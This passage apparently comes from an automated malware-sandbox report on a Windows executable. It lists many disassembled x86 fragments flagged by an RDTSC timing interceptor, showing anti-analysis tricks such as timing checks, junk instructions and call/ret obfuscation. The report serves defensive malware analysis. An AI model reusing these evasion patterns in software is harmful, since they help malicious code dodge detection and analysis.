    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D5941 second address: 10D59A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F30F50FDE2Ch 0x0000000c je 00007F30F50FDE26h 0x00000012 popad 0x00000013 push eax 0x00000014 push ebx 0x00000015 push edi 0x00000016 jmp 00007F30F50FDE33h 0x0000001b pop edi 0x0000001c pop ebx 0x0000001d nop 0x0000001e mov ebx, eax 0x00000020 push dword ptr fs:[00000000h] 0x00000027 mov dword ptr [ebp+1245FFB2h], esi 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov ebx, dword ptr [ebp+122D319Ah] 0x0000003a mov eax, dword ptr [ebp+122D1151h] 0x00000040 mov dword ptr [ebp+122D1E21h], eax 0x00000046 push FFFFFFFFh 0x00000048 or dword ptr [ebp+1244DCA3h], ebx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 pushad 0x00000053 popad 0x00000054 pop eax 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8C7E second address: 10D8C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF3441h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8C93 second address: 10D8CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10D8CAB second address: 10D8CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DABED second address: 10DABFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DC9B8 second address: 10DC9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DC9C3 second address: 10DCA31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F30F50FDE33h 0x0000000e jg 00007F30F50FDE2Ch 0x00000014 popad 0x00000015 nop 0x00000016 mov bx, 2923h 0x0000001a sub ebx, dword ptr [ebp+122D3332h] 0x00000020 push 00000000h 0x00000022 pushad 0x00000023 adc ecx, 09CBDC9Fh 0x00000029 mov esi, dword ptr [ebp+12454D83h] 0x0000002f popad 0x00000030 push 00000000h 0x00000032 xchg eax, esi 0x00000033 jmp 00007F30F50FDE31h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F30F50FDE33h 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBC4D second address: 10DBCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jc 00007F30F4CF343Ah 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F30F4CF3438h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sbb ebx, 6F8426A6h 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov edi, dword ptr [ebp+122D2D28h] 0x00000046 mov eax, dword ptr [ebp+122D101Dh] 0x0000004c jmp 00007F30F4CF3440h 0x00000051 push FFFFFFFFh 0x00000053 mov edi, dword ptr [ebp+122D2C58h] 0x00000059 add dword ptr [ebp+1245BB67h], ecx 0x0000005f nop 0x00000060 push ecx 0x00000061 jc 00007F30F4CF3438h 0x00000067 push edx 0x00000068 pop edx 0x00000069 pop ecx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jbe 00007F30F4CF343Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBCD2 second address: 10DBCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DBCD6 second address: 10DBCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F30F4CF3436h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DD9EF second address: 10DD9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DCBCA second address: 10DCBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DDC45 second address: 10DDC4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEB8F second address: 10DEB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEB93 second address: 10DEC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F30F50FDE28h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D2C6Ch] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov edi, 0F791600h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+122D3900h], edx 0x00000045 mov eax, dword ptr [ebp+122D036Dh] 0x0000004b sub dword ptr [ebp+122D2021h], ecx 0x00000051 push FFFFFFFFh 0x00000053 or dword ptr [ebp+122D35D9h], ebx 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c ja 00007F30F50FDE2Ch 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEC11 second address: 10DEC35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F30F4CF3446h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10DEC35 second address: 10DEC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1082440 second address: 1082444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1082444 second address: 108247E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F30F50FDE34h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F30F50FDE32h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F30F50FDE2Bh 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3722 second address: 10E3728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3728 second address: 10E3744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE38h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E3744 second address: 10E3756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10E4987 second address: 10E498F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10890E8 second address: 10890F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB6A second address: 10EEB6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB6F second address: 10EEB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF3443h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F30F4CF3438h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEB94 second address: 10EEBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F30F50FDE2Dh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEBB7 second address: 10EEBBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEBBB second address: 10EEBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnp 00007F30F50FDE26h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 jmp 00007F30F50FDE2Dh 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEBE7 second address: 10EEBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10EEBEF second address: 10EEBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1079E84 second address: 1079E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1079E88 second address: 1079EB9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F30F50FDE26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnc 00007F30F50FDE26h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f jnc 00007F30F50FDE26h 0x00000025 jmp 00007F30F50FDE2Bh 0x0000002a popad 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1079EB9 second address: 1079ECF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F30F4CF343Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jbe 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1079ECF second address: 1079ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F8244 second address: 10F824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F824A second address: 10F8256 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F7A50 second address: 10F7A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F7A54 second address: 10F7A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F7F3B second address: 10F7F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F7F3F second address: 10F7F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F80E5 second address: 10F80EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F80EC second address: 10F80F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F30F50FDE26h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10F80F9 second address: 10F80FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FC474 second address: 10FC482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F30F50FDE26h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDCE8 second address: 10CDD17 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F30F4CF343Eh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F30F4CF343Eh 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDD17 second address: 10CDD2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F30F50FDE26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDD2D second address: 10CDD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F30F4CF3438h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D2D08h] 0x00000027 push 0CB1E234h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDD65 second address: 10CDD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDECD second address: 10CDED7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CDED7 second address: 10CDEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CE510 second address: 10CE527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CE527 second address: 10CE52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CE52C second address: 10CE59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F30F4CF3438h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D2E88h] 0x0000002a mov edx, dword ptr [ebp+122D1E51h] 0x00000030 push 0000001Eh 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F30F4CF3438h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c ja 00007F30F4CF343Ch 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CE59F second address: 10CE5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10CE5A3 second address: 10CE5C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FC6F7 second address: 10FC6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FC6FB second address: 10FC715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F30F4CF343Eh 0x0000000c jnc 00007F30F4CF3436h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FC715 second address: 10FC71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FC71B second address: 10FC720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCB2E second address: 10FCB5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F30F50FDE37h 0x0000000d jmp 00007F30F50FDE31h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCDF2 second address: 10FCDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCDF8 second address: 10FCDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCDFC second address: 10FCE15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCE15 second address: 10FCE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F30F50FDE36h 0x0000000c jmp 00007F30F50FDE30h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F30F50FDE2Bh 0x00000019 pushad 0x0000001a ja 00007F30F50FDE26h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FCE48 second address: 10FCE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10FD14F second address: 10FD16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE2Eh 0x00000009 jmp 00007F30F50FDE2Dh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11000FE second address: 1100111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF343Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1100111 second address: 1100115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1100115 second address: 1100124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1100124 second address: 110013B instructions: 0x00000000 rdtsc 0x00000002 je 00007F30F50FDE26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F30F50FDE2Bh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1105561 second address: 1105590 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F30F4CF3445h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F30F4CF3438h 0x00000013 push edi 0x00000014 jl 00007F30F4CF3436h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pop edi 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1104332 second address: 110434A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110434A second address: 110434E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 110434E second address: 110435F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11045CB second address: 11045CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1104A41 second address: 1104A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
